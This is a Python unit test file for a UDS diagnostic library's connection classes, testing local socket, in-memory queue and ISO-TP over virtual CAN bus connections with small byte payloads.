class TestSocketConnection(UdsTest):
def server_sock_thread_task(self):
self.thread_started=True
self.sock1, addr = self.server_sock.accept()
def setUp(self):
self.thread_started = False
self.server_sock_thread = threading.Thread(target=self.server_sock_thread_task)
self.server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.setblocking(False)
self.sock1 = None
self.sock2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server_sock.settimeout(0.5)
self.server_sock.bind(('127.0.0.1', 0))
self.server_sock.listen(1)
self.server_sock_thread.start()
t1 = time.time()
while not self.thread_started:
if (time.time() - t1) > 0.5:
raise RuntimeError('Timeout while connecting sockets together.')
time.sleep(0.01)
time.sleep(0.01)
self.sock2.connect(self.server_sock.getsockname())
t1 = time.time()
while self.sock1 is None:
if (time.time() - t1) > 0.5:
raise RuntimeError('Timeout while connecting sockets together.')
def tearDown(self):
if isinstance(self.sock1, socket.socket):
self.sock1.close()
if isinstance(self.sock2, socket.socket):
self.sock2.close()
if isinstance(self.server_sock, socket.socket):
self.server_sock.close()
def test_open(self):
conn = SocketConnection(self.sock1, name='unittest')
self.assertFalse(conn.is_open())
conn.open()
self.assertTrue(conn.is_open())
conn.close()
self.assertFalse(conn.is_open())
def test_transmit(self):
conn1 = SocketConnection(self.sock1, name='unittest')
conn2 = SocketConnection(self.sock2, name='unittest')
with conn1.open():
with conn2.open():
payload1 = b"\x00\x01\x02\x03\x04"
conn1.send(payload1)
payload2 = conn2.wait_frame(timeout=1, exception=True)
self.assertEqual(payload1, payload2)
class TestQueueConnection(UdsTest):
def setUp(self):
self.conn = QueueConnection(name='unittest')
self.conn.open()
def tearDown(self):
self.conn.close()
def test_open(self):
self.assertTrue(self.conn.is_open())
def test_receive(self):
payload = b"\x00\x01\x02\x03"
self.conn.fromuserqueue.put(payload)
frame = self.conn.wait_frame()
self.assertEqual(frame, payload)
def test_send(self):
payload = b"\x00\x01\x02\x03"
self.conn.send(payload)
frame = self.conn.touserqueue.get()
self.assertEqual(frame, payload)
def test_truncate(self):
payload = b"\x00\x01\x02\x03"*5000
self.conn.send(payload)
frame = self.conn.touserqueue.get()
self.assertEqual(len(frame), 4095)
self.assertEqual(frame, payload[0:4095])
self.conn.fromuserqueue.put(payload)
frame = self.conn.wait_frame()
self.assertEqual(len(frame), 4095)
self.assertEqual(frame, payload[0:4095])
def test_reopen(self):
payload = b"\x00\x01\x02\x03"
self.conn.send(payload)
self.conn.fromuserqueue.put(payload)
self.conn.close()
self.conn.open()
with self.assertRaises(TimeoutException):
self.conn.wait_frame(timeout=0.05, exception=True)
self.assertTrue(self.conn.touserqueue.empty())
@unittest.skipIf(_STACK_POSSIBLE == False, 'Cannot test TestPythonIsoTpConnection. %s' % _STACK_UNVAILABLE_REASON)
class TestPythonIsoTpConnection(UdsTest):
def __init__(self, *args, **kwargs):
UdsTest.__init__(self, *args, **kwargs)
if not hasattr(self.__class__, '_next_id'):
self.__class__._next_id=1
self.stack_txid = self.__class__._next_id
self.stack_rxid = self.__class__._next_id +1
self.__class__._next_id += 2
def make_bus(self):
return can.interface.Bus(bustype='socketcan', channel='vcan0', bitrate=500000, receive_own_messages=True)
def setUp(self):
self.vcan0_bus = self.make_bus()
addr = isotp.Address(isotp.AddressingMode.Normal_11bits, rxid=self.stack_rxid, txid=self.stack_txid)
self.conn = PythonIsoTpConnection(isotp.CanStack(bus=self.vcan0_bus, address=addr), name='unittest')
self.conn.open()
def test_open(self):
self.assertTrue(self.conn.is_open())
def test_receive(self):
self.vcan0_bus.send(can.Message(arbitration_id = self.stack_rxid, data = b"\x03\x01\x02\x03", extended_id = False))
frame = self.conn.wait_frame(timeout=1)
self.assertEqual(frame, b"\x01\x02\x03")
def test_send(self):
self.conn.send(b"\xAA\xBB\xCC\xDD\xEE\xFF")
t1 = time.time()
msg = self.vcan0_bus.recv(1)
self.assertIsNotNone(msg)
self.assertEqual(msg.data, b'\x06\xAA\xBB\xCC\xDD\xEE\xFF')
def test_reopen(self):
self.conn.send(b"\x0A\x0B\x0C\x0D")
self.vcan0_bus.send(can.Message(arbitration_id = self.stack_rxid, data = b"\x03\x01\x02\x03", extended_id = False))
self.conn.close()
self.vcan0_bus.shutdown()
self.vcan0_bus = self.make_bus()
self.conn.open(bus=self.vcan0_bus)
with self.assertRaises(TimeoutException):
self.conn.wait_frame(timeout=0.05, exception=True)
self.assertIsNone(self.vcan0_bus.recv(0))
def tearDown(self):
self.conn.close()
self.vcan0_bus.shutdown()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.